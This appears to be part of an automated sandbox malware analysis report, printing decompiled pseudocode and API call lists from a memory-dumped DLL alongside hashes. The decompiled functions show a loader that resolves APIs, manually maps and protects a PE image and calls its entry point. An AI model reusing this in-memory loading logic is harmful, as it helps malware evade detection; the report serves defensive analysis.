                                                                                                                							 *((short*)(_t32 + 4)) = 0;
                                                                                                                						} else {
                                                                                                                							E6E1F2033(_t44, _t32 + 4);
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t25 = E6E1F1634(_v28); // executed
                                                                                                                				}
                                                                                                                				ExitThread(_t25);
                                                                                                                			}


                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492699725.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.492671611.000000006E1F0000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492733821.000000006E1F3000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492766888.000000006E1F5000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492808881.000000006E1F6000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ExitThreadlstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2636182767-0
                                                                                                                • Opcode ID: 636156006ad67301b9c360a24081a80f7032d8b2cab0a876dff6d298715e738c
                                                                                                                • Instruction ID: fbfcda620af3e26654208acccd71c21efc10d398ae5c01b92782ec6c07fca627
                                                                                                                • Opcode Fuzzy Hash: 636156006ad67301b9c360a24081a80f7032d8b2cab0a876dff6d298715e738c
                                                                                                                • Instruction Fuzzy Hash: 5211E2B2208606DFEB11DBA5D858E8B77ECAF16304F018816F055D3152EB30E58BEBD2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 6E21AC37
                                                                                                                • std::ios_base::getloc.LIBCPMTD ref: 6E21AC40
                                                                                                                  • Part of subcall function 6E2188A0: std::locale::locale.LIBCPMTD ref: 6E2188BA
                                                                                                                  • Part of subcall function 6E213020: std::_Lockit::_Lockit.LIBCPMT ref: 6E21304A
                                                                                                                  • Part of subcall function 6E213020: int.LIBCPMTD ref: 6E213063
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3LockitLockit::_std::_std::ios_base::getlocstd::locale::locale
                                                                                                                • String ID:
                                                                                                                • API String ID: 2499403736-0
                                                                                                                • Opcode ID: e888777f6277678fc5c68fadb465dc4156e5c2648d869fee271b694a9f0e48be
                                                                                                                • Instruction ID: f3ee4eb4a4d9258048ef50bc18238b46457d66eaec120d25bff295a46532d5df
                                                                                                                • Opcode Fuzzy Hash: e888777f6277678fc5c68fadb465dc4156e5c2648d869fee271b694a9f0e48be
                                                                                                                • Instruction Fuzzy Hash: D0E01AB590821DDBCB18EBE4C808AEEBBAABF20625F6049189621571D0CB704B01CA90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetUserDefaultLCID.KERNEL32(00000055,?,?,6E22E723,?,00000055,0000009C), ref: 6E222AA4
                                                                                                                • ___crtDownlevelLCIDToLocaleName.LIBCMT ref: 6E222AAB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DefaultDownlevelLocaleNameUser___crt
                                                                                                                • String ID:
                                                                                                                • API String ID: 395733334-0
                                                                                                                • Opcode ID: c9ff482c29f6f8456e3c34089fc1f673382ff359eaa3bd6c59e21c965edd2f47
                                                                                                                • Instruction ID: 0823adf91fb090f3f9cfb7e9b20a01ecbde8d1496a5547f6d4669a1b1526c155
                                                                                                                • Opcode Fuzzy Hash: c9ff482c29f6f8456e3c34089fc1f673382ff359eaa3bd6c59e21c965edd2f47
                                                                                                                • Instruction Fuzzy Hash: CBD0C9B741450EAFCF00ABE4EC0986A3BAEBF59714B444450F91C87511D637B160DBB2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 37%
                                                                                                                			E6E1F16F1(void* __eax, intOrPtr _a4) {
                                                                                                                
                                                                                                                				 *0x6e1f4150 =  *0x6e1f4150 & 0x00000000;
                                                                                                                				_push(0);
                                                                                                                				_push(0x6e1f414c);
                                                                                                                				_push(1);
                                                                                                                				_push(_a4);
                                                                                                                				 *0x6e1f4148 = 0xc; // executed
                                                                                                                				L6E1F1A3E(); // executed
                                                                                                                				return __eax;
                                                                                                                			}




                                                                                                                APIs
                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(6E1F1E82,00000001,6E1F414C,00000000), ref: 6E1F170F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492699725.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.492671611.000000006E1F0000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492733821.000000006E1F3000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492766888.000000006E1F5000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492808881.000000006E1F6000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: DescriptorSecurity$ConvertString
                                                                                                                • String ID:
                                                                                                                • API String ID: 3907675253-0
                                                                                                                • Opcode ID: 62f364ff9f34d1f586590f5367b2415e845b7d58a69aa7bbd7e8ddd7c1f4d473
                                                                                                                • Instruction ID: ecf84d525d305693c4370047df150abdef1cf79737bfea4b788b0d647b67d93b
                                                                                                                • Opcode Fuzzy Hash: 62f364ff9f34d1f586590f5367b2415e845b7d58a69aa7bbd7e8ddd7c1f4d473
                                                                                                                • Instruction Fuzzy Hash: EEC04CB4248780E6EA209F809D49F467AD17762705F118505B115252D1C3F6209AB595
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 86%
                                                                                                                			E6E1F1634(void* __eax) {
                                                                                                                				char _v8;
                                                                                                                				void* _v12;
                                                                                                                				void* __edi;
                                                                                                                				void* _t18;
                                                                                                                				long _t24;
                                                                                                                				long _t26;
                                                                                                                				long _t29;
                                                                                                                				intOrPtr _t40;
                                                                                                                				void* _t41;
                                                                                                                				intOrPtr* _t42;
                                                                                                                				void* _t44;
                                                                                                                
                                                                                                                				_t41 = __eax;
                                                                                                                				_t16 =  *0x6e1f4140;
                                                                                                                				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e1f4140 - 0x63698bc4 &  !( *0x6e1f4140 - 0x63698bc4);
                                                                                                                				_t18 = E6E1F1146( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e1f4140 - 0x63698bc4 &  !( *0x6e1f4140 - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e1f4140 - 0x63698bc4 &  !( *0x6e1f4140 - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
                                                                                                                				if(_t18 != 0) {
                                                                                                                					_t29 = 8;
                                                                                                                					goto L8;
                                                                                                                				} else {
                                                                                                                					_t40 = _v8;
                                                                                                                					_t29 = E6E1F1CBE(_t33, _t40, _t41);
                                                                                                                					if(_t29 == 0) {
                                                                                                                						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
                                                                                                                						_t24 = E6E1F1BAC(_t40, _t44); // executed
                                                                                                                						_t29 = _t24;
                                                                                                                						if(_t29 == 0) {
                                                                                                                							_t26 = E6E1F1020(_t44, _t40); // executed
                                                                                                                							_t29 = _t26;
                                                                                                                							if(_t29 == 0) {
                                                                                                                								_push(_t26);
                                                                                                                								_push(1);
                                                                                                                								_push(_t40);
                                                                                                                								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                                                                                                                									_t29 = GetLastError();
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t42 = _v12;
                                                                                                                					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                                                                                                                					E6E1F201E(_t42);
                                                                                                                					L8:
                                                                                                                					return _t29;
                                                                                                                				}
                                                                                                                			}


                                                                                                                APIs
                                                                                                                  • Part of subcall function 6E1F1146: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E1F1670,?,?,?,?,?,00000002,?,?), ref: 6E1F116A
                                                                                                                  • Part of subcall function 6E1F1146: GetProcAddress.KERNEL32(00000000,?), ref: 6E1F118C
                                                                                                                  • Part of subcall function 6E1F1146: GetProcAddress.KERNEL32(00000000,?), ref: 6E1F11A2
                                                                                                                  • Part of subcall function 6E1F1146: GetProcAddress.KERNEL32(00000000,?), ref: 6E1F11B8
                                                                                                                  • Part of subcall function 6E1F1146: GetProcAddress.KERNEL32(00000000,?), ref: 6E1F11CE
                                                                                                                  • Part of subcall function 6E1F1146: GetProcAddress.KERNEL32(00000000,?), ref: 6E1F11E4
                                                                                                                  • Part of subcall function 6E1F1CBE: memcpy.NTDLL(00000002,?,6E1F167E,?,?,?,?,?,6E1F167E,?,?,?,?,?,?,?), ref: 6E1F1CF5
                                                                                                                  • Part of subcall function 6E1F1CBE: memcpy.NTDLL(00000002,?,?,?,00000002), ref: 6E1F1D2A
                                                                                                                  • Part of subcall function 6E1F1BAC: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E1F1BE4
                                                                                                                  • Part of subcall function 6E1F1020: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 6E1F1059
                                                                                                                  • Part of subcall function 6E1F1020: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E1F10CE
                                                                                                                  • Part of subcall function 6E1F1020: GetLastError.KERNEL32 ref: 6E1F10D4
                                                                                                                • GetLastError.KERNEL32(?,?), ref: 6E1F16B2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492699725.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.492671611.000000006E1F0000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492733821.000000006E1F3000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492766888.000000006E1F5000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492808881.000000006E1F6000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 2673762927-0
                                                                                                                • Opcode ID: a1aba098cebfa33500ace8830efd674397a7de9df07157bac5204890ab00f615
                                                                                                                • Instruction ID: 5bdbe499e1a4fa6c527a0c35820674cffa832dd400bddd07f6b10df1c5980d41
                                                                                                                • Opcode Fuzzy Hash: a1aba098cebfa33500ace8830efd674397a7de9df07157bac5204890ab00f615
                                                                                                                • Instruction Fuzzy Hash: E411E9B6700711EBC710DAE988849DF77FCBF542147184515E90197646D7E0E94BA7E0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                APIs
                                                                                                                • _wcscmp.LIBCMT ref: 6E22F2FE
                                                                                                                • _wcscmp.LIBCMT ref: 6E22F30F
                                                                                                                • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,6E22F5AD,?,00000000), ref: 6E22F32B
                                                                                                                • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,6E22F5AD,?,00000000), ref: 6E22F355
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: InfoLocale_wcscmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 1351282208-0
                                                                                                                • Opcode ID: bbb0cf4fb2b2597535b94a5e9dd7901cb50064d9b9516ce16748e4b0ad8a6b19
                                                                                                                • Instruction ID: f57fbc90acec9668338f7a858cad6cd7b1ac18a21f2ae44297f5d7b9498004c2
                                                                                                                • Opcode Fuzzy Hash: bbb0cf4fb2b2597535b94a5e9dd7901cb50064d9b9516ce16748e4b0ad8a6b19
                                                                                                                • Instruction Fuzzy Hash: 1A01803621561EAFEB519BA8C844ECB37AE9B05766B10C435F918EA180EB60D981CBD0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E6E1F1F0E() {
                                                                                                                				void* _t1;
                                                                                                                				unsigned int _t3;
                                                                                                                				void* _t4;
                                                                                                                				long _t5;
                                                                                                                				void* _t6;
                                                                                                                				intOrPtr _t10;
                                                                                                                				void* _t14;
                                                                                                                
                                                                                                                				_t10 =  *0x6e1f4130;
                                                                                                                				_t1 = CreateEventA(0, 1, 0, 0);
                                                                                                                				 *0x6e1f413c = _t1;
                                                                                                                				if(_t1 == 0) {
                                                                                                                					return GetLastError();
                                                                                                                				}
                                                                                                                				_t3 = GetVersion();
                                                                                                                				if(_t3 != 5) {
                                                                                                                					L4:
                                                                                                                					if(_t14 <= 0) {
                                                                                                                						_t4 = 0x32;
                                                                                                                						return _t4;
                                                                                                                					} else {
                                                                                                                						goto L5;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					if(_t3 >> 8 > 0) {
                                                                                                                						L5:
                                                                                                                						 *0x6e1f412c = _t3;
                                                                                                                						_t5 = GetCurrentProcessId();
                                                                                                                						 *0x6e1f4128 = _t5;
                                                                                                                						 *0x6e1f4130 = _t10;
                                                                                                                						_t6 = OpenProcess(0x10047a, 0, _t5);
                                                                                                                						 *0x6e1f4124 = _t6;
                                                                                                                						if(_t6 == 0) {
                                                                                                                							 *0x6e1f4124 =  *0x6e1f4124 | 0xffffffff;
                                                                                                                						}
                                                                                                                						return 0;
                                                                                                                					} else {
                                                                                                                						_t14 = _t3 - _t3;
                                                                                                                						goto L4;
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E1F1462,74B063F0), ref: 6E1F1F1D
                                                                                                                • GetVersion.KERNEL32 ref: 6E1F1F2C
                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 6E1F1F48
                                                                                                                • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E1F1F61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492699725.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.492671611.000000006E1F0000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492733821.000000006E1F3000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492766888.000000006E1F5000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492808881.000000006E1F6000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                                • String ID:
                                                                                                                • API String ID: 845504543-0
                                                                                                                • Opcode ID: 356c1a5be1a28f040dff10c54445607e886c6756ca577695402485ed4adcb41c
                                                                                                                • Instruction ID: df17b7e0d088c4352ab50928f952ce34235205329ec792eb4b5fee6d65442e1e
                                                                                                                • Opcode Fuzzy Hash: 356c1a5be1a28f040dff10c54445607e886c6756ca577695402485ed4adcb41c
                                                                                                                • Instruction Fuzzy Hash: 3AF0A4B0658B11DBDF405BA8BD197983BE0A717712F208116F543C61C4D370A187BBC9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,`Y"n,?,6E225960,?,20001004,?,00000002,?,00000004,?,00000000), ref: 6E222A4D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: InfoLocale
                                                                                                                • String ID: `Y"n
                                                                                                                • API String ID: 2299586839-1958164319
                                                                                                                • Opcode ID: 8930013390cf8e374a3872ef3b47013828a5f080b7b48ca2c546e5277cf1e573
                                                                                                                • Instruction ID: daf446842aa399e1ee41ce16c80c02cce5ebd373cdcb52d2c85a45e40f7b34ae
                                                                                                                • Opcode Fuzzy Hash: 8930013390cf8e374a3872ef3b47013828a5f080b7b48ca2c546e5277cf1e573
                                                                                                                • Instruction Fuzzy Hash: E3D017B300010EEF8F019FE4E8498AA3BABFB09224B404810F91846010D7B3A520DB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,6E223B82,?,?,?,6E2E1304), ref: 6E21FEBF
                                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,6E2E1304), ref: 6E21FEC8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                • String ID:
                                                                                                                • API String ID: 3192549508-0
                                                                                                                • Opcode ID: 596fc162931161d09aaf11ce60f597ba763613fd4decfa90f00c40f15c72987e
                                                                                                                • Instruction ID: 327189c6577858047b15a2dd2e1fc2a15667eed2ce8938f1c63a6769fce9d87c
                                                                                                                • Opcode Fuzzy Hash: 596fc162931161d09aaf11ce60f597ba763613fd4decfa90f00c40f15c72987e
                                                                                                                • Instruction Fuzzy Hash: 24B09231248608FBCF142BD5E80DB587F6AEB06652F004091F60D44051DBB39812CEB6
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E6E1F23A5(long _a4) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				signed int _v16;
                                                                                                                				short* _v32;
                                                                                                                				void _v36;
                                                                                                                				void* _t57;
                                                                                                                				signed int _t58;
                                                                                                                				signed int _t61;
                                                                                                                				signed int _t62;
                                                                                                                				void* _t63;
                                                                                                                				signed int* _t68;
                                                                                                                				intOrPtr* _t69;
                                                                                                                				intOrPtr* _t71;
                                                                                                                				intOrPtr _t72;
                                                                                                                				intOrPtr _t75;
void* _t76;
signed int _t77;
void* _t78;
void _t80;
signed int _t81;
signed int _t84;
signed int _t86;
short* _t87;
void* _t89;
signed int* _t90;
long _t91;
signed int _t93;
signed int _t94;
signed int _t100;
signed int _t102;
void* _t104;
long _t108;
signed int _t110;

_t108 = _a4;
_t76 =  *(_t108 + 8);
if((_t76 & 0x00000003) != 0) {
	L3:
	return 0;
}
_a4 =  *[fs:0x4];
_v8 =  *[fs:0x8];
if(_t76 < _v8 || _t76 >= _a4) {
	_t102 =  *(_t108 + 0xc);
	__eflags = _t102 - 0xffffffff;
	if(_t102 != 0xffffffff) {
		_t91 = 0;
		__eflags = 0;
		_a4 = 0;
		_t57 = _t76;
		do {
			_t80 =  *_t57;
			__eflags = _t80 - 0xffffffff;
			if(_t80 == 0xffffffff) {
				goto L9;
			}
			__eflags = _t80 - _t91;
			if(_t80 >= _t91) {
				L20:
				_t63 = 0;
				L60:
				return _t63;
			}
			L9:
			__eflags =  *(_t57 + 4);
			if( *(_t57 + 4) != 0) {
				_t12 =  &_a4;
				 *_t12 = _a4 + 1;
				__eflags =  *_t12;
			}
			_t91 = _t91 + 1;
			_t57 = _t57 + 0xc;
			__eflags = _t91 - _t102;
		} while (_t91 <= _t102);
		__eflags = _a4;
		if(_a4 == 0) {
			L15:
			_t81 =  *0x6e1f4178;
			_t110 = _t76 & 0xfffff000;
			_t58 = 0;
			__eflags = _t81;
			if(_t81 <= 0) {
				L18:
				_t104 = _t102 | 0xffffffff;
				_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
				__eflags = _t61;
				if(_t61 < 0) {
					_t62 = 0;
					__eflags = 0;
				} else {
					_t62 = _a4;
				}
				__eflags = _t62;
				if(_t62 == 0) {
					L59:
					_t63 = _t104;
					goto L60;
				} else {
					__eflags = _v12 - 0x1000000;
					if(_v12 != 0x1000000) {
						goto L59;
					}
					__eflags = _v16 & 0x000000cc;
					if((_v16 & 0x000000cc) == 0) {
						L46:
						_t63 = 1;
						 *0x6e1f41c0 = 1;
						__eflags =  *0x6e1f41c0;
						if( *0x6e1f41c0 != 0) {
							goto L60;
						}
						_t84 =  *0x6e1f4178;
						__eflags = _t84;
						_t93 = _t84;
						if(_t84 <= 0) {
							L51:
							__eflags = _t93;
							if(_t93 != 0) {
								L58:
								 *0x6e1f41c0 = 0;
								goto L5;
							}
							_t77 = 0xf;
							__eflags = _t84 - _t77;
							if(_t84 <= _t77) {
								_t77 = _t84;
							}
							_t94 = 0;
							__eflags = _t77;
							if(_t77 < 0) {
								L56:
								__eflags = _t84 - 0x10;
								if(_t84 < 0x10) {
									_t86 = _t84 + 1;
									__eflags = _t86;
									 *0x6e1f4178 = _t86;
								}
								goto L58;
							} else {
								do {
									_t68 = 0x6e1f4180 + _t94 * 4;
									_t94 = _t94 + 1;
									__eflags = _t94 - _t77;
									 *_t68 = _t110;
									_t110 =  *_t68;
								} while (_t94 <= _t77);
								goto L56;
							}
						}
						_t69 = 0x6e1f417c + _t84 * 4;
						while(1) {
							__eflags =  *_t69 - _t110;
							if( *_t69 == _t110) {
								goto L51;
							}
							_t93 = _t93 - 1;
							_t69 = _t69 - 4;
							__eflags = _t93;
							if(_t93 > 0) {
								continue;
							}
							goto L51;
						}
						goto L51;
					}
					_t87 = _v32;
					__eflags =  *_t87 - 0x5a4d;
					if( *_t87 != 0x5a4d) {
						goto L59;
					}
					_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
					__eflags =  *_t71 - 0x4550;
					if( *_t71 != 0x4550) {
						goto L59;
					}
					__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
					if( *((short*)(_t71 + 0x18)) != 0x10b) {
						goto L59;
					}
					_t78 = _t76 - _t87;
					__eflags =  *((short*)(_t71 + 6));
					_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
					if( *((short*)(_t71 + 6)) <= 0) {
						goto L59;
					}
					_t72 =  *((intOrPtr*)(_t89 + 0xc));
					__eflags = _t78 - _t72;
					if(_t78 < _t72) {
						goto L46;
					}
					__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
					if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
						goto L46;
					}
					__eflags =  *(_t89 + 0x27) & 0x00000080;
					if(( *(_t89 + 0x27) & 0x00000080) != 0) {
						goto L20;
					}
					goto L46;
				}
			} else {
				goto L16;
			}
			while(1) {
				L16:
				__eflags =  *((intOrPtr*)(0x6e1f4180 + _t58 * 4)) - _t110;
				if( *((intOrPtr*)(0x6e1f4180 + _t58 * 4)) == _t110) {
					break;
				}
				_t58 = _t58 + 1;
				__eflags = _t58 - _t81;
				if(_t58 < _t81) {
					continue;
				}
				goto L18;
			}
			__eflags = _t58;
			if(_t58 <= 0) {
				goto L5;
			}
			 *0x6e1f41c0 = 1;
			__eflags =  *0x6e1f41c0;
			if( *0x6e1f41c0 != 0) {
				goto L5;
			}
			__eflags =  *((intOrPtr*)(0x6e1f4180 + _t58 * 4)) - _t110;
			if( *((intOrPtr*)(0x6e1f4180 + _t58 * 4)) == _t110) {
				L32:
				_t100 = 0;
				__eflags = _t58;
				if(_t58 < 0) {
					L34:
					 *0x6e1f41c0 = 0;
					goto L5;
				} else {
					goto L33;
				}
				do {
					L33:
					_t90 = 0x6e1f4180 + _t100 * 4;
					_t100 = _t100 + 1;
					__eflags = _t100 - _t58;
					 *_t90 = _t110;
					_t110 =  *_t90;
				} while (_t100 <= _t58);
				goto L34;
			}
			_t58 = _t81 - 1;
			__eflags = _t58;
			if(_t58 < 0) {
				L28:
				__eflags = _t81 - 0x10;
				if(_t81 < 0x10) {
					_t81 = _t81 + 1;
					__eflags = _t81;
					 *0x6e1f4178 = _t81;
				}
				_t58 = _t81 - 1;
				goto L32;
			} else {
				goto L25;
			}
			while(1) {
				L25:
				__eflags =  *((intOrPtr*)(0x6e1f4180 + _t58 * 4)) - _t110;
				if( *((intOrPtr*)(0x6e1f4180 + _t58 * 4)) == _t110) {
					break;
				}
				_t58 = _t58 - 1;
				__eflags = _t58;
				if(_t58 >= 0) {
					continue;
				}
				break;
			}
			__eflags = _t58;
			if(__eflags >= 0) {
				if(__eflags == 0) {
					goto L34;
				}
				goto L32;
			}
                                                                                                                							goto L28;
                                                                                                                						}
                                                                                                                						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                                                						__eflags = _t75 - _v8;
                                                                                                                						if(_t75 < _v8) {
                                                                                                                							goto L20;
                                                                                                                						}
                                                                                                                						__eflags = _t75 - _t108;
                                                                                                                						if(_t75 >= _t108) {
                                                                                                                							goto L20;
                                                                                                                						}
                                                                                                                						goto L15;
                                                                                                                					}
                                                                                                                					L5:
                                                                                                                					_t63 = 1;
                                                                                                                					goto L60;
                                                                                                                				} else {
                                                                                                                					goto L3;
                                                                                                                				}
                                                                                                                			}




































                                                                                                                0x6e1f24a1
                                                                                                                0x6e1f24a3
                                                                                                                0x6e1f24a5
                                                                                                                0x6e1f24b8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f24b8
                                                                                                                0x00000000
                                                                                                                0x6e1f24a5
                                                                                                                0x6e1f2417
                                                                                                                0x6e1f241a
                                                                                                                0x6e1f241d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f241f
                                                                                                                0x6e1f2421
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f2421
                                                                                                                0x6e1f23e6
                                                                                                                0x6e1f23e8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6E1F2456
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492699725.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.492671611.000000006E1F0000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492733821.000000006E1F3000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492766888.000000006E1F5000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492808881.000000006E1F6000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: MemoryQueryVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 2850889275-0
                                                                                                                • Opcode ID: 5130a6c217c252658baec1b1935188286048d1870c1b8ca80a29218f43d0859c
                                                                                                                • Instruction ID: fb614d49cd74381b22ca79dea6325143c82b2df53106ba24f3cd0c0d294c2ac7
                                                                                                                • Opcode Fuzzy Hash: 5130a6c217c252658baec1b1935188286048d1870c1b8ca80a29218f43d0859c
                                                                                                                • Instruction Fuzzy Hash: D261F470704A86CFEB59CFA8D8A069937F5AB55315B348528D416C7194F770D8C3E6D0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • EnumSystemLocalesW.KERNEL32(6E22298C,00000001,?,6E22E7C2,6E22E860,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6E2229CE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: EnumLocalesSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 2099609381-0
                                                                                                                • Opcode ID: 2beca46405fd08b95fdc83f0c0c8d176f00e8e33eefb49921410183d03f1d1b2
                                                                                                                • Instruction ID: ba9e976f6fd645d8709a015e7d18cd1f1b9fc42694e5da8c3870266c49fe419b
                                                                                                                • Opcode Fuzzy Hash: 2beca46405fd08b95fdc83f0c0c8d176f00e8e33eefb49921410183d03f1d1b2
                                                                                                                • Instruction Fuzzy Hash: 7DE0467205060DAFDF01CFA0C849B693BE6BB09312F448460B50C5B540C272A0A0DF64
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetProcessHeap.KERNEL32(6E21CBFF,6E249188,00000008,6E21CDD5,?,00000001,?,6E2491A8,0000000C,6E21CD74,?,00000001,?), ref: 6E223484
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: HeapProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 54951025-0
                                                                                                                • Opcode ID: 3fbd09d1ea64e4267c1b419970725d88138b12be6fa0b76d1e6302ecf866705e
                                                                                                                • Instruction ID: 0ee58c7334fe325201ee785d7239cda81bc227b6a25e86f4725acc2da13a3987
                                                                                                                • Opcode Fuzzy Hash: 3fbd09d1ea64e4267c1b419970725d88138b12be6fa0b76d1e6302ecf866705e
